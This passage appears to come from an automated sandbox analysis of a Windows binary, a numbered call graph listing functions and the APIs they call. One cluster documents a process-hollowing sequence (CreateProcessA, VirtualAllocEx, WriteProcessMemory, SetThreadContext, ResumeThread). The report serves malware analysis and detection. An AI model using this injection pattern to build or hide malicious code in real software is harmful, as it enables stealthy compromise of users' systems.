6f0bb8aa GetProcAddress 43084->43085 43085->43078 43087 6f0bb8f2 43085->43087 43087->43078 43103 6f0ba350 VariantInit VariantInit VariantInit 43088->43103 43089 6f0b8c63 43090 6f0b8cf9 43089->43090 43113 6f0b8b10 EnterCriticalSection 43089->43113 43090->43065 43092 6f0b8c83 43093 6f0b8ce2 43092->43093 43094 6f0b8c9f 43092->43094 43122 6f0bb9a0 43092->43122 43093->43065 43130 6f0bbab0 43094->43130 43097 6f0b8cd3 43097->43093 43144 6f0b8ff0 69 API calls std::tr1::_Xweak 43097->43144 43102->43084 43106 6f0ba3b5 43103->43106 43104 6f0ba505 VariantClear VariantClear VariantClear 43105 6f0ba52a 43104->43105 43105->43089 43106->43104 43107 6f0ba3e0 VariantCopy 43106->43107 43108 6f0ba3f9 43107->43108 43109 6f0ba3ff VariantClear 43107->43109 43108->43109 43110 6f0ba413 43109->43110 43110->43104 43111 6f0ba549 VariantClear VariantClear VariantClear 43110->43111 43112 6f0ba57a 43111->43112 43112->43089 43114 6f0b8b4b 43113->43114 43116 6f109bb5 77 API calls 43114->43116 43121 6f0b8b53 LeaveCriticalSection 43114->43121 43117 6f0b8b64 43116->43117 43120 6f0b8b80 43117->43120 43145 6f0b7370 79 API calls 2 library calls 43117->43145 43146 6f0b96d0 77 API calls 43120->43146 43121->43092 43123 6f0bb9dc 43122->43123 43124 6f109bb5 77 API calls 43123->43124 43129 6f0bba7a 43123->43129 43125 6f0bba3a 43124->43125 43128 6f0bba6a 43125->43128 43191 6f0c5f00 77 API calls 2 library calls 43125->43191 43147 6f0c6fd0 43128->43147 43129->43094 43192 6f0cb580 43130->43192 43132 6f0bbaf3 43136 6f0b8cbd 43132->43136 43197 6f0baf30 VariantInit VariantInit VariantInit 43132->43197 43134 6f0bbb0d 43135 6f109bb5 77 API calls 43134->43135 43134->43136 43135->43136 43136->43093 43137 6f0b8d60 EnterCriticalSection 43136->43137 43217 6f0b9750 43137->43217 43140 6f0b8e0a 43140->43097 43142 6f0b8d97 43142->43140 43219 6f0b8e20 43142->43219 43143 6f0b8e02 43143->43097 43144->43093 43145->43120 43146->43121 43150 6f0c700a 43147->43150 43164 6f0c78c2 43147->43164 43148 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43149 6f0c8326 43148->43149 43149->43129 43151 6f0bd920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43150->43151 43150->43164 43152 6f0c78b5 43151->43152 43153 6f0bd920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43152->43153 43152->43164 43154 6f0c7920 43153->43154 43155 6f0bd920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43154->43155 43154->43164 43156 6f0c7986 43155->43156 43157 6f0c79df 43156->43157 43158 6f0bd920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43156->43158 43159 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43157->43159 43157->43164 43158->43157 43160 6f0c7a7b 43159->43160 43161 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43160->43161 43160->43164 43162 6f0c7acb 43161->43162 43163 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43162->43163 43162->43164 43165 6f0c7b19 43163->43165 43164->43148 43165->43164 43166 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43165->43166 43167 6f0c7b90 43166->43167 43167->43164 43168 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43167->43168 43169 6f0c7c0b 43168->43169 43169->43164 43170 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43169->43170 43171 6f0c7ca5 43170->43171 43171->43164 43172 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43171->43172 43173 6f0c7d3f 43172->43173 43173->43164 43174 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43173->43174 43175 6f0c7dbb 43174->43175 43175->43164 43176 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43175->43176 43177 6f0c7e44 43176->43177 43177->43164 43178 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43177->43178 43179 6f0c7eb5 43178->43179 43179->43164 43180 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43179->43180 43181 6f0c7f6e 43180->43181 43181->43164 43182 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43181->43182 43183 6f0c8081 43182->43183 43183->43164 43184 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43183->43184 43185 6f0c80ca 43184->43185 43185->43164 43186 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43185->43186 43187 6f0c80f9 43186->43187 43187->43164 43188 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43187->43188 43189 6f0c8175 43188->43189 43189->43164 43190 6f0bd9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 43189->43190 43190->43164 43191->43128 43193 6f0cb5cb VariantInit VariantInit 43192->43193 43194 6f0cb5b5 43192->43194 43196 6f0cb5ee 43193->43196 43194->43132 43195 6f0cb675 VariantClear VariantClear 43195->43132 43196->43195 43200 6f0baf97 43197->43200 43198 6f0bb22c VariantClear VariantClear VariantClear 43199 6f0bb254 43198->43199 43199->43134 43200->43198 43201 6f0baffe VariantCopy 43200->43201 43202 6f0bb01d VariantClear 43201->43202 43203 6f0bb017 43201->43203 43204 6f0bb035 43202->43204 43203->43202 43204->43198 43205 6f109bb5 77 API calls 43204->43205 43206 6f0bb0ae 43205->43206 43207 6f10a136 __NMSG_WRITE 66 API calls 43206->43207 43208 6f0bb108 43207->43208 43209 6f0bb28d VariantClear VariantClear VariantClear 43208->43209 43210 6f0bb190 SafeArrayGetLBound SafeArrayGetUBound 43208->43210 43214 6f0bb1fd 43208->43214 43211 6f0bb2ba 43209->43211 43212 6f0bb28b 43210->43212 43213 6f0bb1bf SafeArrayAccessData 43210->43213 43211->43134 43212->43209 43213->43212 43215 6f0bb1d3 _memcpy_s 43213->43215 43214->43198 43216 6f0bb1eb SafeArrayUnaccessData 43215->43216 43216->43212 43216->43214 43218 6f0b8d88 LeaveCriticalSection 43217->43218 43218->43140 43218->43142 43220 6f0b8e39 43219->43220 43221 6f0b8e7c EnterCriticalSection 43220->43221 43227 6f0b8f7f 43220->43227 43222 6f0b8e9e 43221->43222 43223 6f0b8eac LeaveCriticalSection 43222->43223 43224 6f0b8ebd 43223->43224 43223->43227 43225 6f109bb5 77 API calls 43224->43225 43226 6f0b8ec4 _memset 43225->43226 43228 6f0bc020 259 API calls 43226->43228 43227->43143 43228->43227 43230 6f109bb5 77 API calls 43229->43230 43231 6f0b632b 43230->43231 43232 6f109bb5 77 API calls 43231->43232 43233 6f0b6350 43232->43233 43234 6f0b5050 77 API calls 43233->43234 43235 6f0b636e 43234->43235 43236 6f109bb5 77 API calls 43235->43236 43237 6f0b6375 43236->43237 43238 6f0b5050 77 API calls 43237->43238 43239 6f0b6392 43238->43239 43240 6f109bb5 77 API calls 43239->43240 43241 6f0b6399 43240->43241 43242 6f0b5050 77 API calls 43241->43242 43243 6f0b63b3 43242->43243 43244 6f109bb5 77 API calls 43243->43244 43245 6f0b63c9 43244->43245 43246 6f0b6459 43245->43246 43247 6f0b63d4 43245->43247 43254 6f109533 66 API calls std::exception::_Copy_str 43246->43254 43248 6f0b16b0 338 API calls 43247->43248 43253 6f0b6402 43248->43253 43250 6f0b646b 43255 6f10ac75 RaiseException 43250->43255 43252 6f0b6482 43253->42809 43254->43250 43255->43252 43256 6f0c69c0 43257 6f0c6a01 SafeArrayGetLBound SafeArrayGetUBound 43256->43257 43258 6f0c69f3 43256->43258 43260 6f0c6a2a 43257->43260 43262 6f0c6a92 43257->43262 43258->43257 43259 6f0c6a30 SafeArrayGetElement 43259->43260 43259->43262 43260->43259 43260->43262 43263 6f0c3990 43260->43263 43265 6f0c39cc 43263->43265 43264 6f0c3a61 43264->43260 43265->43264 43268 6f0c3a90 43265->43268 43272 6f0c3ad7 43268->43272 43269 6f0c3bb7 43270 6f0c3a34 43269->43270 43271 6f0c3bce SafeArrayDestroy 43269->43271 43270->43260 43271->43270 43272->43269 43273 6f0c3b65 SafeArrayGetLBound SafeArrayGetUBound 43272->43273 43273->43269 43274 6f0c3b97 43273->43274 43274->43269 43276 6f0c3c10 SafeArrayGetElement 43274->43276 43277 6f0c3c57 43276->43277 43278 6f0c3dc9 43276->43278 43277->43278 43279 6f0c3c7d VariantInit 43277->43279 43278->43274 43280 6f0c3c9e 43279->43280 43281 6f0c3d16 VariantClear 43280->43281 43282 6f0c3d2c VariantClear 43281->43282 43283 6f0c3d3d 43281->43283 43282->43278 43283->43282 43284 6f0c3d85 VariantClear 43283->43284 43285 6f0c3d95 43284->43285 43285->43274 43286 6f0cea40 43287 6f109bb5 77 API calls 43286->43287 43288 6f0cea6b 43287->43288 43289 6f0cea7e SysAllocString 43288->43289 43290 6f0cea99 43288->43290 43289->43290 43599 61c6470 43600 61c6493 43599->43600 43606 61b1568 338 API calls 43600->43606 43607 61b0eb3 338 API calls 43600->43607 43608 61b0f14 338 API calls 43600->43608 43601 61c64a8 43609 61b2820 43601->43609 43626 61b31f3 43601->43626 43643 61b2840 43601->43643 43602 61c64e7 43606->43601 43607->43601 43608->43601 43611 61b2873 43609->43611 43610 61b3255 43610->43602 43611->43610 43618 61c5a08 SetThreadContext 43611->43618 43619 61c5a10 SetThreadContext 43611->43619 43624 61c5c58 WriteProcessMemory 43611->43624 43625 61c5c51 WriteProcessMemory 43611->43625 43660 61c5fd8 43611->43660 43664 61c5fe0 43611->43664 43668 61c64f7 43611->43668 43674 61c6508 43611->43674 43680 61c5da8 43611->43680 43684 61c5db0 43611->43684 43688 61c5b38 43611->43688 43692 61c5b31 43611->43692 43696 61c5918 43611->43696 43700 61c5920 43611->43700 43618->43611 43619->43611 43624->43611 43625->43611 43628 61b2979 43626->43628 43627 61b3255 43627->43602 43628->43627 43629 61c5a08 SetThreadContext 43628->43629 43630 61c5a10 SetThreadContext 43628->43630 43631 61c5fd8 CreateProcessA 43628->43631 43632 61c5fe0 CreateProcessA 43628->43632 43633 61c5b38 VirtualAllocEx 43628->43633 43634 61c5b31 VirtualAllocEx 43628->43634 43635 61c6508 338 API calls 43628->43635 43636 61c64f7 338 API calls 43628->43636 43637 61c5da8 ReadProcessMemory 43628->43637 43638 61c5db0 ReadProcessMemory 43628->43638 43639 61c5c58 WriteProcessMemory 43628->43639 43640 61c5c51 WriteProcessMemory 43628->43640 43641 61c5918 ResumeThread 43628->43641 43642 61c5920 ResumeThread 43628->43642 43629->43628 43630->43628 43631->43628 43632->43628 43633->43628 43634->43628 43635->43628 43636->43628 43637->43628 43638->43628 43639->43628 43640->43628 43641->43628 43642->43628 43645 61b2873 43643->43645 43644 61b3255 43644->43602 43645->43644 43646 61c5c58 WriteProcessMemory 43645->43646 43647 61c5c51 WriteProcessMemory 43645->43647 43648 61c5a08 SetThreadContext 43645->43648 43649 61c5a10 SetThreadContext 43645->43649 43650 61c5fd8 CreateProcessA 43645->43650 43651 61c5fe0 CreateProcessA 43645->43651 43652 61c5b38 VirtualAllocEx 43645->43652 43653 61c5b31 VirtualAllocEx 43645->43653 43654 61c6508 338 API calls 43645->43654 43655 61c64f7 338 API calls 43645->43655 43656 61c5da8 ReadProcessMemory 43645->43656 43657 61c5db0 ReadProcessMemory 43645->43657 43658 61c5918 ResumeThread 43645->43658 43659 61c5920 ResumeThread 43645->43659 43646->43645 43647->43645 43648->43645 43649->43645 43650->43645 43651->43645 43652->43645 43653->43645 43654->43645 43655->43645 43656->43645 43657->43645 43658->43645 43659->43645 43661 61c5fe0 CreateProcessA 43660->43661 43663 61c62bc 43661->43663 43663->43663 43665 61c6067 CreateProcessA 43664->43665 43667 61c62bc 43665->43667 43669 61c6508 43668->43669 43671 61b1568 338 API calls 43669->43671 43672 61b0eb3 338 API calls 43669->43672 43673 61b0f14 338 API calls 43669->43673 43670 61c654c 43670->43611 43671->43670 43672->43670 43673->43670 43675 61c652f 43674->43675 43677 61b1568 338 API calls 43675->43677 43678 61b0eb3 338 API calls 43675->43678 43679 61b0f14 338 API calls 43675->43679 43676 61c654c 43676->43611 43677->43676 43678->43676 43679->43676 43681 61c5db0 ReadProcessMemory 43680->43681 43683 61c5e74 43681->43683 43683->43611 43685 61c5dfc ReadProcessMemory 43684->43685 43687 61c5e74 43685->43687 43687->43611 43689 61c5b7c VirtualAllocEx 43688->43689 43691 61c5bf4 43689->43691 43691->43611 43693 61c5b7c VirtualAllocEx 43692->43693 43695 61c5bf4 43693->43695 43695->43611 43697 61c5964 ResumeThread 43696->43697 43699 61c59b0 43697->43699 43699->43611 43701 61c5964 ResumeThread 43700->43701 43703 61c59b0 43701->43703 43703->43611 43704 6f0cd2e0 43705 6f109bb5 77 API calls 43704->43705 43706 6f0cd32f 43705->43706 43707 6f0cd33e 43706->43707 43708 6f0cd3db 43706->43708 43717 6f0cc530 VariantInit VariantInit SafeArrayCreateVector 43707->43717 43728 6f109533 66 API calls std::exception::_Copy_str 43708->43728 43710 6f0cd3ed 43729 6f10ac75 RaiseException 43710->43729 43712 6f0cd404 43715 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43716 6f0cd3d5 43715->43716 43718 6f0cc5ac SafeArrayPutElement VariantClear 43717->43718 43719 6f0cc5a4 43717->43719 43720 6f0cc7e4 43718->43720 43724 6f0cc5cf 43718->43724 43719->43718 43721 6f0cc7f7 VariantClear VariantClear 43720->43721 43722 6f0cc7f0 SafeArrayDestroy 43720->43722 43723 6f0cc817 43721->43723 43722->43721 43723->43715 43724->43720 43725 6f0cc7d9 43724->43725 43733 6f10919e 67 API calls 3 library calls 43724->43733 43730 6f0cdf70 43725->43730 43728->43710 43729->43712 43734 6f0cd410 43730->43734 43732 6f0cdf80 43732->43720 43733->43725 43735 6f0cd44e 43734->43735 43736 6f0cd472 VariantInit VariantInit VariantInit 43734->43736 43735->43732 43748 6f0cd470 _memcpy_s 43736->43748 43737 6f0cd704 VariantClear VariantClear VariantClear 43739 6f0cd75d 43737->43739 43737->43748 43738 6f109d66 _malloc 66 API calls 43738->43748 43739->43732 43740 6f0cd579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 43740->43748 43741 6f0cd5ec SafeArrayPutElement 43741->43748 43742 6f0cd5d6 SafeArrayUnaccessData 43742->43741 43743 6f0cd633 SafeArrayPutElement VariantClear 43743->43748 43744 6f0cd6fa SafeArrayDestroy 43744->43748 43746 6f0bdb30 5 API calls 43746->43748 43747 6f0c56b0 83 API calls 43747->43748 43748->43736 43748->43737 43748->43738 43748->43739 43748->43740 43748->43741 43748->43742 43748->43743 43748->43744 43748->43746 43748->43747 43749 6f0c6880 9 API calls 43748->43749 43750 6f109d2c 66 API calls 2 library calls 43748->43750 43749->43748 43750->43748 43291 1564f00 43292 1564f17 43291->43292 43293 1564f1e 43291->43293 43292->43293 43296 156a720 43292->43296 43300 156a469 43292->43300 43297 156a73d 43296->43297 43298 156a745 43297->43298 43304 156ae8f 43297->43304 43298->43293 43301 156a472 43300->43301 43302 156a49c 43301->43302 43303 156ae8f 338 API calls 43301->43303 43302->43293 43303->43302 43305 156aec7 43304->43305 43309 156b6a1 43305->43309 43313 156b6a8 43305->43313 43306 156af3a 43306->43298 43310 156b6ec 43309->43310 43317 6f0d2ed0 43310->43317 43311 156b733 43311->43306 43314 156b6ec 43313->43314 43316 6f0d2ed0 338 API calls 43314->43316 43315 156b733 43315->43306 43316->43315 43318 6f0d2f09 43317->43318 43319 6f0d3006 43317->43319 43320 6f109bb5 77 API calls 43318->43320 43319->43311 43321 6f0d2f31 43320->43321 43322 6f109bb5 77 API calls 43321->43322 43323 6f0d2f54 43322->43323 43324 6f0b5050 77 API calls 43323->43324 43325 6f0d2f6e 43324->43325 43326 6f109bb5 77 API calls 43325->43326 43327 6f0d2f75 43326->43327 43328 6f0b5050 77 API calls 43327->43328 43329 6f0d2f8f 43328->43329 43330 6f109bb5 77 API calls 43329->43330 43331 6f0d2f96 43330->43331 43332 6f0b5050 77 API calls 43331->43332 43333 6f0d2fb0 43332->43333 43334 6f109bb5 77 API calls 43333->43334 43335 6f0d2fb7 43334->43335 43336 6f0b5050 77 API calls 43335->43336 43337 6f0d2fd1 43336->43337 43338 6f0b16b0 338 API calls 43337->43338 43338->43319 43751 6f0bdfb0 43752 6f0bdfef SafeArrayGetLBound SafeArrayGetUBound 43751->43752 43753 6f0bdfe5 43751->43753 43754 6f0be018 43752->43754 43756 6f0be065 43752->43756 43753->43752 43755 6f0be020 SafeArrayGetElement 43754->43755 43754->43756 43758 6f0caf00 43754->43758 43755->43754 43755->43756 43759 6f0caf32 43758->43759 43763 6f0cafda 43759->43763 43764 6f0c3f10 43759->43764 43763->43754 43774 6f0c3f4f 43764->43774 43765 6f0c3f6f SafeArrayGetLBound SafeArrayGetUBound 43766 6f0c40e2 43765->43766 43765->43774 43767 6f0c4129 43766->43767 43768 6f0c4122 SafeArrayDestroy 43766->43768 43767->43763 43776 6f0cc410 43767->43776 43768->43767 43769 6f0c3fb2 VariantInit SafeArrayGetElement 43770 6f0c4163 VariantClear 43769->43770 43769->43774 43770->43766 43771 6f0c40bc VariantClear 43771->43766 43771->43769 43772 6f0c4142 VariantClear 43772->43766 43774->43765 43774->43766 43774->43769 43774->43771 43774->43772 43775 6f0c40fc VariantClear 43774->43775 43775->43766 43775->43774 43777 6f0cc449 43776->43777 43778 6f0cc46e SafeArrayGetLBound SafeArrayGetUBound 43777->43778 43784 6f0cc4f0 43777->43784 43779 6f0cc499 43778->43779 43778->43784 43782 6f0cc4a2 SafeArrayGetElement 43779->43782 43783 6f0c3a90 8 API calls 43779->43783 43779->43784 43780 6f0cc518 43780->43763 43781 6f0cc511 SafeArrayDestroy 43781->43780 43782->43779 43782->43784 43783->43779 43784->43780 43784->43781 43785 6f10a2ab 43786 6f10a2b7 __setmbcp 43785->43786 43787 6f10a339 43786->43787 43788 6f10a2bf 43786->43788 43790 6f10a39a 43787->43790 43791 6f10a33f 43787->43791 43837 6f10e904 HeapCreate 43788->43837 43792 6f10a3f8 43790->43792 43793 6f10a39f 43790->43793 43796 6f10a35d 43791->43796 43803 6f10a2c8 __setmbcp 43791->43803 43905 6f10d4e7 43791->43905 43792->43803 43926 6f10ec2f 79 API calls __freefls@4 43792->43926 43917 6f10e948 TlsGetValue DecodePointer TlsSetValue 43793->43917 43794 6f10a2c4 43794->43803 43838 6f10ec9d GetModuleHandleW 43794->43838 43801 6f10a371 43796->43801 43913 6f10dd67 67 API calls __setmbcp 43796->43913 43798 6f10a3a4 43918 6f10cb28 43798->43918 43916 6f10a384 70 API calls __mtterm 43801->43916 43805 6f10a2d4 __RTC_Initialize 43808 6f10a2d8 43805->43808 43813 6f10a2e4 GetCommandLineA 43805->43813 43908 6f10e922 HeapDestroy 43808->43908 43809 6f10a367 43914 6f10e97c 70 API calls __setmbcp 43809->43914 43810 6f10a3bc DecodePointer 43817 6f10a3d1 43810->43817 43863 6f10fc46 GetEnvironmentStringsW 43813->43863 43814 6f10a36c 43915 6f10e922 HeapDestroy 43814->43915 43819 6f10a3d5 43817->43819 43820 6f10a3ec 43817->43820 43924 6f10e9b9 66 API calls 4 library calls 43819->43924 43925 6f109d2c 66 API calls 2 library calls 43820->43925 43825 6f10a3dc GetCurrentThreadId 43825->43803 43826 6f10a302 43909 6f10e97c 70 API calls __setmbcp 43826->43909 43829 6f10a30e 43830 6f10a322 43829->43830 43889 6f10f915 43829->43889 43836 6f10a327 43830->43836 43912 6f10dd67 67 API calls __setmbcp 43830->43912 43833 6f10a337 43833->43826 43836->43803 43837->43794 43839 6f10ecb1 43838->43839 43840 6f10ecba GetProcAddress GetProcAddress GetProcAddress GetProcAddress 43838->43840 43927 6f10e97c 70 API calls __setmbcp 43839->43927 43842 6f10ed04 TlsAlloc 43840->43842 43845 6f10ed52 TlsSetValue 43842->43845 43846 6f10ee13 43842->43846 43843 6f10ecb6 43843->43805 43845->43846 43847 6f10ed63 43845->43847 43846->43805 43928 6f10d2a3 RtlEncodePointer EncodePointer __init_pointers __initp_misc_winsig 43847->43928 43849 6f10ed68 EncodePointer EncodePointer EncodePointer EncodePointer 43929 6f1122be InitializeCriticalSectionAndSpinCount 43849->43929 43851 6f10eda7 43852 6f10edab DecodePointer 43851->43852 43853 6f10ee0e 43851->43853 43855 6f10edc0 43852->43855 43931 6f10e97c 70 API calls __setmbcp 43853->43931 43855->43853 43856 6f10cb28 __calloc_crt 66 API calls 43855->43856 43857 6f10edd6 43856->43857 43857->43853 43858 6f10edde DecodePointer 43857->43858 43859 6f10edef 43858->43859 43859->43853 43860 6f10edf3 43859->43860 43930 6f10e9b9 66 API calls 4 library calls 43860->43930 43862 6f10edfb GetCurrentThreadId 43862->43846 43864 6f10fc62 WideCharToMultiByte 43863->43864 43865 6f10a2f4 43863->43865 43867 6f10fc97 43864->43867 43868 6f10fccf FreeEnvironmentStringsW 43864->43868 43876 6f10db22 GetStartupInfoW 43865->43876 43932 6f10cae3 66 API calls _malloc 43867->43932 43868->43865 43870 6f10fc9d 43870->43868 43871 6f10fca5 WideCharToMultiByte 43870->43871 43872 6f10fcc3 FreeEnvironmentStringsW 43871->43872 43873 6f10fcb7 43871->43873 43872->43865 43933 6f109d2c 66 API calls 2 library calls 43873->43933 43875 6f10fcbf 43875->43872 43877 6f10cb28 __calloc_crt 66 API calls 43876->43877 43886 6f10db40 43877->43886 43878 6f10dceb GetStdHandle 43883 6f10dcb5 43878->43883 43879 6f10cb28 __calloc_crt 66 API calls 43879->43886 43880 6f10dd4f SetHandleCount 43888 6f10a2fe 43880->43888 43881 6f10dcfd GetFileType 43881->43883 43882 6f10dc35 43882->43883 43884 6f10dc61 GetFileType 43882->43884 43885 6f10dc6c InitializeCriticalSectionAndSpinCount 43882->43885 43883->43878 43883->43880 43883->43881 43887 6f10dd23 InitializeCriticalSectionAndSpinCount 43883->43887 43884->43882 43884->43885 43885->43882 43885->43888 43886->43879 43886->43882 43886->43883 43886->43888 43887->43883 43887->43888 43888->43826 43910 6f10fb8b 94 API calls 3 library calls 43888->43910 43890 6f10f91e 43889->43890 43892 6f10f923 _strlen 43889->43892 43934 6f10f4de 93 API calls __setmbcp 43890->43934 43893 6f10cb28 __calloc_crt 66 API calls 43892->43893 43896 6f10a317 43892->43896 43898 6f10f958 _strlen 43893->43898 43894 6f10f9a7 43936 6f109d2c 66 API calls 2 library calls 43894->43936 43896->43830 43911 6f10d2fa 77 API calls 4 library calls 43896->43911 43897 6f10cb28 __calloc_crt 66 API calls 43897->43898 43898->43894 43898->43896 43898->43897 43899 6f10f9cd 43898->43899 43902 6f10f9e4 43898->43902 43935 6f10d019 66 API calls __mbstowcs_s_l 43898->43935 43937 6f109d2c 66 API calls 2 library calls 43899->43937 43938 6f10b26d 10 API calls __call_reportfault 43902->43938 43904 6f10f9f0 43939 6f10d391 43905->43939 43907 6f10d4f2 43907->43796 43908->43803 43909->43808 43910->43829 43911->43830 43912->43833 43913->43809 43914->43814 43915->43801 43916->43803 43917->43798 43920 6f10cb31 43918->43920 43921 6f10a3b0 43920->43921 43922 6f10cb4f Sleep 43920->43922 43966 6f1125c3 43920->43966 43921->43803 43921->43810 43923 6f10cb64 43922->43923 43923->43920 43923->43921 43924->43825 43925->43803 43926->43803 43927->43843 43928->43849 43929->43851 43930->43862 43931->43846 43932->43870 43933->43875 43934->43892 43935->43898 43936->43896 43937->43896 43938->43904 43940 6f10d39d __setmbcp 43939->43940 43941 6f112438 __lock 61 API calls 43940->43941 43942 6f10d3a4 43941->43942 43943 6f10d3cf RtlDecodePointer 43942->43943 43949 6f10d44e 43942->43949 43946 6f10d3e6 DecodePointer 43943->43946 43943->43949 43945 6f10d49c 43947 6f10d4cb __setmbcp 43945->43947 43963 6f11235f LeaveCriticalSection 43945->43963 43955 6f10d3f9 43946->43955 43947->43907 43962 6f10d4bc LeaveCriticalSection _doexit 43949->43962 43950 6f10d4b3 43952 6f10d4bc 43950->43952 43964 6f10d279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 43950->43964 43954 6f10d4c9 43952->43954 43965 6f11235f LeaveCriticalSection 43952->43965 43954->43907 43955->43949 43957 6f10d410 DecodePointer 43955->43957 43959 6f10d41f DecodePointer DecodePointer 43955->43959 43960 6f10e936 RtlEncodePointer 43955->43960 43961 6f10e936 RtlEncodePointer 43957->43961 43959->43955 43960->43955 43961->43955 43962->43945 43963->43950 43965->43954 43967 6f1125cf 43966->43967 43970 6f1125ea 43966->43970 43968 6f1125db 43967->43968 43967->43970 43975 6f10d7d8 66 API calls __getptd_noexit 43968->43975 43971 6f1125fd RtlAllocateHeap 43970->43971 43973 6f112624 43970->43973 43976 6f10c86e DecodePointer 43970->43976 43971->43970 43971->43973 43972 6f1125e0 43972->43920 43973->43920 43975->43972 43976->43970 43339 6f0c64d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 43340 6f0c655c SafeArrayPutElement VariantClear 43339->43340 43341 6f0c6554 43339->43341 43342 6f0c6584 SafeArrayPutElement VariantClear 43340->43342 43352 6f0c6655 43340->43352 43341->43340 43346 6f0c65cd 43342->43346 43342->43352 43343 6f0c666c VariantClear VariantClear VariantClear 43344 6f0c6665 SafeArrayDestroy 43344->43343 43346->43352 43353 6f0bdb30 VariantInit SafeArrayCreateVector SafeArrayPutElement 43346->43353 43348 6f0c663a 43348->43352 43357 6f0c56b0 43348->43357 43352->43343 43352->43344 43354 6f0bdb8c 43353->43354 43355 6f0bdbf0 SafeArrayDestroy 43354->43355 43356 6f0bdbf7 VariantClear 43354->43356 43355->43356 43356->43348 43358 6f0c56e0 43357->43358 43359 6f0c56f4 43357->43359 43358->43359 43372 6f0c57c0 81 API calls std::_Xinvalid_argument 43358->43372 43362 6f0c570d VariantInit VariantCopy 43359->43362 43363 6f0c5744 43359->43363 43373 6f0c57c0 81 API calls std::_Xinvalid_argument 43359->43373 43362->43359 43362->43363 43364 6f0c6880 VariantInit VariantInit 43363->43364 43374 6f1091e1 43364->43374 43366 6f0c68cd SafeArrayCreateVector SafeArrayPutElement VariantClear 43367 6f0c6913 SafeArrayPutElement 43366->43367 43368 6f0c692d 43366->43368 43367->43368 43369 6f0c6980 SafeArrayDestroy 43368->43369 43371 6f0c6987 43368->43371 43369->43371 43370 6f0c6994 VariantClear VariantClear 43370->43352 43371->43370 43372->43359 43373->43359 43375 6f0d1fd0 43376 6f109bb5 77 API calls 43375->43376 43377 6f0d2013 43376->43377 43378 6f0d2020 43377->43378 43379 6f0d21f3 43377->43379 43400 6f0d6480 43378->43400 43434 6f109533 66 API calls std::exception::_Copy_str 43379->43434 43382 6f0d220b 43435 6f10ac75 RaiseException 43382->43435 43384 6f0d2226 43385 6f0d206c 43416 6f0a35f0 43385->43416 43387 6f0d216e 43427 6f0d2300 43387->43427 43389 6f0d2194 43390 6f0d2300 77 API calls 43389->43390 43391 6f0d21a0 43390->43391 43392 6f0d2300 77 API calls 43391->43392 43393 6f0d21ad 43392->43393 43394 6f0d2300 77 API calls 43393->43394 43395 6f0d21ba 43394->43395 43396 6f0d2300 77 API calls 43395->43396 43397 6f0d21c6 43396->43397 43398 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43397->43398 43399 6f0d21ef 43398->43399 43401 6f0d655d 43400->43401 43404 6f0d64c8 43400->43404 43402 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43401->43402 43403 6f0d657d 43402->43403 43403->43385 43404->43401 43405 6f0d651d 43404->43405 43436 6f0a2f40 77 API calls 43404->43436 43405->43401 43439 6f0a2f40 77 API calls 43405->43439 43408 6f0d6535 43440 6f0d6400 77 API calls std::tr1::_Xweak 43408->43440 43409 6f0d64f5 43437 6f0d6400 77 API calls std::tr1::_Xweak 43409->43437 43412 6f0d654e 43441 6f10ac75 RaiseException 43412->43441 43413 6f0d650e 43438 6f10ac75 RaiseException 43413->43438 43442 6f0f6d40 43416->43442 43419 6f0d6480 77 API calls 43420 6f0a364c 43419->43420 43449 6f0a4b30 43420->43449 43422 6f0a36a7 43453 6f0d86e0 43422->43453 43424 6f0a36bc 43425 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43424->43425 43426 6f0a3701 43425->43426 43426->43387 43428 6f0d231d 43427->43428 43429 6f109bb5 77 API calls 43428->43429 43433 6f0d23aa 43428->43433 43431 6f0d2331 43429->43431 43430 6f0d2374 43430->43389 43431->43430 43479 6f0d2480 77 API calls 43431->43479 43433->43389 43434->43382 43435->43384 43436->43409 43437->43413 43438->43405 43439->43408 43440->43412 43441->43401 43443 6f0d6480 77 API calls 43442->43443 43444 6f0f6d7f 43443->43444 43461 6f0d8d80 43444->43461 43447 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43448 6f0a3630 43447->43448 43448->43419 43450 6f0a4b65 43449->43450 43471 6f0a4fa0 43450->43471 43452 6f0a4b7f 43452->43422 43457 6f0d8728 43453->43457 43454 6f0d8765 43455 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43454->43455 43456 6f0d878a 43455->43456 43456->43424 43457->43454 43477 6f0d7cd0 77 API calls 2 library calls 43457->43477 43459 